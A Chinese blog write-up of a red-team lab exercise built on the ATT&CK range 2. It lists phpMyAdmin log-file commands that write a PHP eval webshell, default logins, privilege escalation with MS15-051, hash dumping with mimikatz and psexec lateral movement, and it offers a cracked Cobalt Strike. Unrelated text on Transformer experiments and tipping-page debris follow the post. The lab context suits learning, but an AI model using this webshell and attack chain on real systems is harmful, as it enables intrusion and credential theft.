实验篇 安服杯(内部赛)复现

一,环境搭建

安服杯的环境是在ATT&CK红队评估实战靶场二的基础上搭建的,下面简单讲一下复现思路。

1网络配置

在ATT&CK红队评估实战靶场二的基础上,将WEB和PC的非域内的网卡设置为桥接模式,并将两台主机的网卡ipv4都设置为随机分配IP。
下面的DNS配置随意即可,设置为10.10.10.10也可以。
在这里插入图片描述

2补充内容

安装phpstudy和yxcms,php选用php5.5.9,phpmyadmn选用4.8版本,mysql选用5.6版本。

3复现的环境

需要请私信,比较大就不搞公开分享了,谢谢理解

二,渗透流程

这里简单提一下吧,CS这款工具不多说了吧,需要4.3英文破解版的可以私信我。

1边界突破

(1)数据库phpmyadmin漏洞写马

首先弱口令(root,root)进去
show variables like “%general%”
set global general_log=on;# 开启日志
set global general_log_file=‘C:/phpStudy/WWW/yxcms/hack.php’;# 设置日志位置为网站目录
select “<?php eval($_POST[apple]);?>”;
在这里插入图片描述

利用pl向数据库写马即可,然后蚁剑连接。

(2)任意文件写入

首先弱口令进入后台,admin,123456
在这里插入图片描述

在前台模板传马,并连接

在这里插入图片描述

2内网渗透

(1)域内信息收集

上线后与WEB靶机进行交互,查看域环境:

shell net time /domain

在这里插入图片描述

(上图为例子)
查看网络配置,发现WEB靶机配置有双网卡,存在内网环境

shell ipconfig
在这里插入图片描述
使用命令

net computers

查看网络环境中存活的机器,得到如下三个结果
在这里插入图片描述

(2)权限提升&HashDump

之后尝试导出NTLM Hash,首先使用MS15-051进行提权
在这里插入图片描述(上图截取自大佬博客)

获得System权限的Beacon
在这里插入图片描述

使用minikatz成功导出Hash
在这里插入图片描述

3横向移动

在target处查看第二步中已发现的目标。

之后在WEB靶机上配置端口转发
在这里插入图片描述

并尝试进行横向移动,在CS的

View—>Target

下使用psexec模块尝试进行横向移动
在这里插入图片描述

注意配置好域名和Listener,点击运行后CS会执行一系列的活动,如使用mimikatz进行PTH操作,最终我们就能拿到PC靶机的Beacon

在这里插入图片描述在这里插入图片描述在这里插入图片描述

对于域控也是一样的,这里是在域控中设置了一个flag(安服杯是在每台主机里都设置了一个flag)
在这里插入图片描述

自此,三个靶机全部拿下。
链接: 大佬NB!

三,结束语

身为小白的我能为你带来一丝收获,那将是我的荣幸。

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
复现Transformer网络的实验,你需要进行以下步骤1. 数据准备:选择适合的数据集,并进行预处理,例如分词、标记化等。确保集被划分为训练集、验证和测试集。 2. 构建模型:按照Transformer的架构,构建模型的编码器和解码器部分。编码器和解码器都由多个层堆叠而成,每个层都包含多头自注意力机制和前馈神经网络。 3. 定义损失函数:选择适当的损失函数,例如交叉熵损失函数,在目标序列上计算模型输出与真实标签之间的差异。 4. 训练模型:使用训练数据集,将数据输入模型中,通过反向传播算法来更新模型的参数。可以使用优化器(如Adam)来调整学习率。 5. 模型评估:使用验证数据集评估模型的性能。计算评价指标,如准确率、BLEU分数等,来衡量模型生成序列的质量。 6. 超参数调优:根据实验结果,调整模型的超参数,包括学习率、批次大小、隐藏单元数等,以获得更好的性能。 7. 测试模型:使用测试数据集评估模型的泛化能力。检查模型在新数据上的性能,验证模型是否能正确生成预测序列。 8. 结果分析:分析模型生成序列的质量,并根据需求进行改进和调整。 请注意,以上步骤仅为一般性指导,具体实现可能因应用场景和数据集的不同而有所变化。复现Transformer网络的实验需要一定的编程和机器学习基础知识。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

这周末在做梦

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值